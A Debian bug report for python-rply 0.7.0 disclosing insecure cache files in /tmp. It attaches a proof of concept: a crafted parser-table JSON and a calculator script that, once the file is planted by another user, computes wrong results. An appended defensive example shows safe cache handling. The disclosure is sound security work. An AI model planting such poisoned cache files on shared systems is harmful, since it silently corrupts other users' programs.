Resent-From: Jakub Wilk <jwilk@debian.org>
Original-Sender: Jakub Wilk <jwilk@master.debian.org>
Resent-To: debian-bugs-dist@lists.debian.org
Resent-CC: jwilk@debian.org, Debian Python Modules Team
 <python-modules-team@lists.alioth.debian.org>
Resent-Date: Tue, 14 Jan 2014 09:21:01 +0000
Resent-Message-ID: <handler.735263.B.138969104426279@bugs.debian.org>
X-Debian-PR-Message: report 735263
X-Debian-PR-Package: src:python-rply
X-Debian-PR-Keywords: security
X-Debian-PR-Source: python-rply
Date: Tue, 14 Jan 2014 10:17:11 +0100
From: Jakub Wilk <jwilk@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Message-ID: <20140114091711.GA3006@jwilk.net>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="3MwIy2ne0vdjdPXF"
Content-Disposition: inline
X-Reportbug-Version: 6.4.4
User-Agent: Mutt/1.5.21 (2010-09-15)
Delivered-To: submit@bugs.debian.org
Resent-Sender: Debian BTS <debbugs@buxtehude.debian.org>
x-debian-approved: yes
Subject: [Python-modules-team] Bug#735263: python-rply: insecure use of /tmp


--3MwIy2ne0vdjdPXF
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Disposition: inline

Source: python-rply
Version: 0.7.0-1
Severity: grave
Tags: security
Justification: user security hole

rply stores its cache files in /tmp. This is insecure, because /tmp is 
world-writable, and the filenames rply uses are of course predictable.

Proof of concept is attached. If you put the rply-*.json file in /tmp 
and make it world-readable, then the tiny calculator's math will start 
to be slightly off (even when run by a different user than the owner of 
the cache file):

$ ls -l /tmp/rply-*.json
-rw-r--r-- 1 eve users 730 Jan 13 22:20 /tmp/rply-1-tinycalc-72306a09ee3b3fe5697e2d0114eb3ee132a6ff7a.json

$ whoami
jwilk

$ echo 69 - 37 - 10 | python3 tinycalc.py
69 - 37 - 10 = 42

-- 
Jakub Wilk

--3MwIy2ne0vdjdPXF
Content-Type: application/json
Content-Disposition: attachment; filename="rply-1-tinycalc-72306a09ee3b3fe5697e2d0114eb3ee132a6ff7a.json"
Content-Transfer-Encoding: 7bit

{"start": "main",
 "terminals": ["MINUS", "NUMBER", "PLUS", "error"],
 "lr_goto": [{"main": 1, "exp": 2}, {}, {}, {}, {"exp": 6}, {"exp": 7}, {}, {}],
 "rr_conflicts": [],
 "precedence": {"PLUS": ["left", 1], "MINUS": ["left", 1]},
 "lr_action": [{"NUMBER": 3},
               {"$end": 0},
               {"PLUS": 4, "MINUS": 5, "$end": -1},
               {"PLUS": -4, "MINUS": -4, "$end": -4},
               {"NUMBER": 3},
               {"NUMBER": 3},
               {"PLUS": 4, "MINUS": 5, "$end": -3},
               {"PLUS": 4, "MINUS": 5, "$end": -2}],
 "sr_conflicts": [],
 "default_reductions": [0, 0, 0, -4, 0, 0, 0, 0],
 "productions": [["S'", ["main"], ["right", 0]],
                 ["main", ["exp"], ["right", 0]],
                 ["exp", ["exp", "MINUS", "exp"], ["left", 1]],
                 ["exp", ["exp", "PLUS", "exp"], ["left", 1]],
                 ["exp", ["NUMBER"], ["right", 0]]]}
--3MwIy2ne0vdjdPXF
Content-Type: text/x-python; charset=us-ascii
Content-Disposition: attachment; filename="tinycalc.py"

#!/usr/bin/python3

import sys

import rply

# Tokens: integers and the two operators; whitespace is skipped.
lg = rply.LexerGenerator()
lg.add('PLUS', r'\+')
lg.add('MINUS', r'-')
lg.add('NUMBER', r'\d+')

lg.ignore(r'\s+')

# cache_id names the on-disk parser table. rply 0.7.0 looks for it in /tmp
# under a predictable name (the rply-1-tinycalc-*.json file attached to
# this report), so a pre-planted file is picked up instead of a freshly
# generated table.
pg = rply.ParserGenerator(
    ['NUMBER', 'PLUS', 'MINUS'],
    precedence=[('left', ['PLUS', 'MINUS'])],
    cache_id='tinycalc'
)

@pg.production('main : exp')
def main(p):
    [exp] = p
    return exp

@pg.production('exp : exp PLUS exp')
@pg.production('exp : exp MINUS exp')
def exp_op(p):
    [lhs, op, rhs] = p
    if op.getstr() == '+':
        return lhs + rhs
    else:
        return lhs - rhs

@pg.production('exp : NUMBER')
def exp_num(p):
    [tok] = p
    return int(tok.getstr())

lexer = lg.build()
parser = pg.build()   # uses the cached table when one is found

for line in sys.stdin:
    line = line.strip()
    if not line:      # skip blank input lines instead of failing to parse
        continue
    n = parser.parse(lexer.lex(line))
    print(line, '=', n)

# vim:ts=4 sw=4 et

--3MwIy2ne0vdjdPXF--
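The defensive counterpart to the report above, as an added example that is not rply's code and not part of the bug report: keep the parser-table cache in a per-user directory rather than /tmp, write it atomically with 0600 permissions, and before loading an existing file verify on the open descriptor that it is a regular file owned by the current user and not writable by anyone else, treating anything else as a cache miss. It assumes a Unix host (os.getuid, O_NOFOLLOW) and a hypothetical XDG-style cache directory.

```python
import json
import os
import stat
import tempfile

# Assumption: a per-user cache directory instead of the shared /tmp that
# rply 0.7.0 used; XDG_CACHE_HOME is the usual override on Linux desktops.
def user_cache_dir():
    base = os.environ.get("XDG_CACHE_HOME") or os.path.expanduser("~/.cache")
    path = os.path.join(base, "rply")
    os.makedirs(path, mode=0o700, exist_ok=True)
    return path

def cache_file_is_trustworthy(fd):
    """A cache table may be loaded only from a regular file that we own
    and that nobody else can write; anything else is treated as a miss."""
    st = os.fstat(fd)          # fstat on the open fd: no check-then-open race
    return (stat.S_ISREG(st.st_mode)
            and st.st_uid == os.getuid()
            and not st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def load_cache(path):
    """Return the parsed table, or None when the file is missing, planted
    by another user, writable by others, a symlink, or not valid JSON."""
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:
        return None
    with os.fdopen(fd, "r") as f:
        if not cache_file_is_trustworthy(fd):
            return None
        try:
            return json.load(f)
        except ValueError:
            return None

def write_cache(path, table):
    """Write atomically: mkstemp creates a 0600 file with O_EXCL, and the
    rename means readers never observe a half-written table."""
    fd, tmp = tempfile.mkstemp(prefix=".rply-", dir=os.path.dirname(path))
    try:
        with os.fdopen(fd, "w") as f:
            json.dump(table, f)
        os.replace(tmp, path)
    except BaseException:
        os.unlink(tmp)
        raise
```

The ownership and mode checks are what stop the planted file from the report: a world-readable cache owned by another user fails st_uid, and a table the process regenerates itself is rewritten under its own uid with 0600.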


